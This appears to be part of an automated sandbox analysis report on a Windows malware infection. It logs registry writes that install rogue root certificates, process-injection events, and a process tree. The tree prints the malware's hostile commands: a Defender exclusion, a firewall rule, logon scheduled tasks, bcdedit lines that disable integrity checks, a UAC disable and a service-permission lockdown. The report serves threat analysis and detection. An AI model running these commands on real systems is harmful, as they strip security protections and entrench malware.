f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	bd1WomvtfddaPIsukh6Mi1KR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2448	file.exe
2804	powershell.exe
1404	nmNNzXaLg4wXxwjYAX3aGb98.exe
1992	va5doQL3q4S6YWWF7jom7c9M.exe
780	nsyD606.tmp
1592	nmNNzXaLg4wXxwjYAX3aGb98.exe
1592	nmNNzXaLg4wXxwjYAX3aGb98.exe
1592	nmNNzXaLg4wXxwjYAX3aGb98.exe
1592	nmNNzXaLg4wXxwjYAX3aGb98.exe
1592	nmNNzXaLg4wXxwjYAX3aGb98.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
2592	va5doQL3q4S6YWWF7jom7c9M.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
956	S5KV4yldRzQLMnJBD7trg9f5.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
1548	powershell.EXE
2040	injector.exe
2040	injector.exe
2040	injector.exe
1548	powershell.EXE
1548	powershell.EXE
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe
2040	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2448	file.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2792	jsc.exe
Token: SeDebugPrivilege	1992	va5doQL3q4S6YWWF7jom7c9M.exe
Token: SeDebugPrivilege	1404	nmNNzXaLg4wXxwjYAX3aGb98.exe
Token: SeImpersonatePrivilege	1404	nmNNzXaLg4wXxwjYAX3aGb98.exe
Token: SeImpersonatePrivilege	1992	va5doQL3q4S6YWWF7jom7c9M.exe
Token: SeSystemEnvironmentPrivilege	2124	csrss.exe
Token: SeDebugPrivilege	1548	powershell.EXE
Token: SeDebugPrivilege	1624	powershell.EXE
Token: SeSecurityPrivilege	524	sc.exe
Token: SeSecurityPrivilege	524	sc.exe
Token: SeDebugPrivilege	968	powershell.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1928	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2448 wrote to memory of 2804	2448	file.exe	28
PID 2448 wrote to memory of 2804	2448	file.exe	28
PID 2448 wrote to memory of 2804	2448	file.exe	28
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2448 wrote to memory of 2792	2448	file.exe	30
PID 2792 wrote to memory of 2612	2792	jsc.exe	31
PID 2792 wrote to memory of 2612	2792	jsc.exe	31
PID 2792 wrote to memory of 2612	2792	jsc.exe	31
PID 2792 wrote to memory of 2612	2792	jsc.exe	31
PID 2792 wrote to memory of 1992	2792	jsc.exe	33
PID 2792 wrote to memory of 1992	2792	jsc.exe	33
PID 2792 wrote to memory of 1992	2792	jsc.exe	33
PID 2792 wrote to memory of 1992	2792	jsc.exe	33
PID 2792 wrote to memory of 1404	2792	jsc.exe	34
PID 2792 wrote to memory of 1404	2792	jsc.exe	34
PID 2792 wrote to memory of 1404	2792	jsc.exe	34
PID 2792 wrote to memory of 1404	2792	jsc.exe	34
PID 2792 wrote to memory of 2252	2792	jsc.exe	36
PID 2792 wrote to memory of 2252	2792	jsc.exe	36
PID 2792 wrote to memory of 2252	2792	jsc.exe	36
PID 2792 wrote to memory of 2252	2792	jsc.exe	36
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2252 wrote to memory of 1928	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	37
PID 2792 wrote to memory of 2656	2792	jsc.exe	39
PID 2792 wrote to memory of 2656	2792	jsc.exe	39
PID 2792 wrote to memory of 2656	2792	jsc.exe	39
PID 2792 wrote to memory of 2656	2792	jsc.exe	39
PID 2252 wrote to memory of 780	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	43
PID 2252 wrote to memory of 780	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	43
PID 2252 wrote to memory of 780	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	43
PID 2252 wrote to memory of 780	2252	3Bihw9xme2xYRgoU7XBPv7zZ.exe	43
PID 1928 wrote to memory of 2176	1928	BroomSetup.exe	46
PID 1928 wrote to memory of 2176	1928	BroomSetup.exe	46
PID 1928 wrote to memory of 2176	1928	BroomSetup.exe	46
PID 1928 wrote to memory of 2176	1928	BroomSetup.exe	46
PID 2176 wrote to memory of 2500	2176	cmd.exe	48
PID 2176 wrote to memory of 2500	2176	cmd.exe	48
PID 2176 wrote to memory of 2500	2176	cmd.exe	48
PID 2176 wrote to memory of 2500	2176	cmd.exe	48
PID 2176 wrote to memory of 1184	2176	cmd.exe	49
PID 2176 wrote to memory of 1184	2176	cmd.exe	49
PID 2176 wrote to memory of 1184	2176	cmd.exe	49
PID 2176 wrote to memory of 1184	2176	cmd.exe	49
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 1816	2792	jsc.exe	53
PID 2792 wrote to memory of 2432	2792	jsc.exe	54
PID 2792 wrote to memory of 2432	2792	jsc.exe	54

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Users\Admin\Pictures\bd1WomvtfddaPIsukh6Mi1KR.exe
    "C:\Users\Admin\Pictures\bd1WomvtfddaPIsukh6Mi1KR.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    PID:2612
- - C:\Users\Admin\Pictures\va5doQL3q4S6YWWF7jom7c9M.exe
    "C:\Users\Admin\Pictures\va5doQL3q4S6YWWF7jom7c9M.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
  - - C:\Users\Admin\Pictures\va5doQL3q4S6YWWF7jom7c9M.exe
      "C:\Users\Admin\Pictures\va5doQL3q4S6YWWF7jom7c9M.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      PID:2592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2912
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:2456
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2040
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:2680
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1584
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1744
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:928
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2600
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2132
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1324
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2392
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2176
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2276
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1596
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2116
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1164
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1984
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2296
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2764
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:292
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1788
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:1520
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:524
